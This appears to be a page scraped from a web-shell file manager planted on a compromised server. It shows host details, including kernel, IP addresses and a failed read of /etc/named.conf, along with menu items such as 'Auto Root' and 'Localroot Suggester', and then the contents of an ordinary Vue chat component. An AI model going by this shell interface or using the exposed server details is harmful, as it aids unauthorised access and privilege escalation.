Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 18.188.39.197
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
unp_probe /
resources /
js /
components /
Delete
Unzip
Name
Size
Permission
Date
Action
ChatConversations.vue
2.76
KB
-rw-r--r--
2021-02-02 18:24
ChatForm.vue
1.84
KB
-rw-r--r--
2021-02-10 12:05
ChatMessages.vue
2.35
KB
-rw-r--r--
2021-02-09 19:42
ConversationParticipants.vue
1.23
KB
-rw-r--r--
2021-02-02 18:24
Save
Rename
<template> <div class="card card-default"> <div class="card-header">Participants</div> <div class="card-body"> <ul class="chat"> <li class="left clearfix border-bottom py-1" v-for="(participant, index) in participants" :key="index"> <div class="chat-body clearfix"> <div class="d-flex align-items-center header"> <div class="primary-font participant-name">{{ participant.name }}</div> <span class="participant-type pl-1"> ({{ participant.participation[0].messageable_type}})</span> </div> </div> </li> </ul> </div> </div> </template> <script> export default { props: ["conversation"], data: () => ({ participants: [] }), methods: { getParticipants(conversationId) { axios .get(`/chat/conversations/${conversationId}/participants`) .then(response => { this.participants = response.data; }); } }, created() { this.getParticipants(this.conversation); } }; </script> <style lang="scss" scoped> ul.chat { padding: 0; list-style: none; } .participant-name { font-size: 1rem; } .participant-type { font-size: .8rem; color: #565151; } </style>